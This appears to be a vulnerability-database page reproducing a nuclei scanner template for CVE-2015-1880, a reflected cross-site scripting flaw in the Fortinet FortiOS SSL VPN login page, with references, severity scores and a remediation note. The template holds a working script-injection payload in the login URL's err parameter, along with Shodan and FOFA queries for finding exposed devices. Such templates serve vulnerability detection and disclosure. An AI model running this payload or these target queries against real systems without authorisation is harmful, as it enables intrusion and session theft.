Lucene search
K

Fortinet FortiOS <=5.2.3 - Cross-Site Scripting

🗓️ 01 Jun 2026 05:38:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Fortinet FortiOS 5.2.x before 5.2.3 has a cross-site scripting vulnerability in the SSL VPN login page, allowing remote attackers to inject arbitrary web script or HTML

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Fortinet FortiADC sslvpn login page cross-site scripting vulnerability
7 May 201500:00
cnvd
CVE
CVE-2015-1880
12 May 201519:00
cve
Cvelist
CVE-2015-1880
12 May 201519:00
cvelist
Fortinet
Multiple products cross-site scripting vulnerabilities
25 Feb 201500:00
fortinet
Tenable Nessus
Fortinet FortiOS 5.2.x < 5.2.3 Multiple XSS
18 Feb 201600:00
nessus
NVD
CVE-2015-1880
12 May 201519:59
nvd
OpenVAS
Fortinet FortiGate Reflected XSS Vulnerability (FG-IR-15-005)
16 Jun 201500:00
openvas
Prion
Cross site scripting
12 May 201519:59
prion
id: CVE-2015-1880

info:
  name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability.
  reference:
    - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
    - http://www.fortiguard.com/advisory/FG-IR-15-005/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1880
    - http://www.securitytracker.com/id/1032261
    - http://www.securitytracker.com/id/1032262
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-1880
    cwe-id: CWE-79
    epss-score: 0.55556
    epss-percentile: 0.98117
    cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortios
    shodan-query:
      - http.html:"/remote/login" "xxxxxxxx"
      - http.favicon.hash:945408572
      - cpe:"cpe:2.3:o:fortinet:fortios"
      - port:10443 http.favicon.hash:945408572
    fofa-query:
      - body="/remote/login" "xxxxxxxx"
      - icon_hash=945408572
  tags: cve2015,cve,xss,fortigates,intrusive,fortinet,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <script>alert('{{randstr}}')</script>

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009d791953dc6274a730d08959d569fdeb53550672e98c74ad8750a11d92eaa43e02201c4e63fe9b5a1abdcf99795868fcad2e0eba4fd2d44e6a3d25dbdb1de0f0c2a1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.55556
30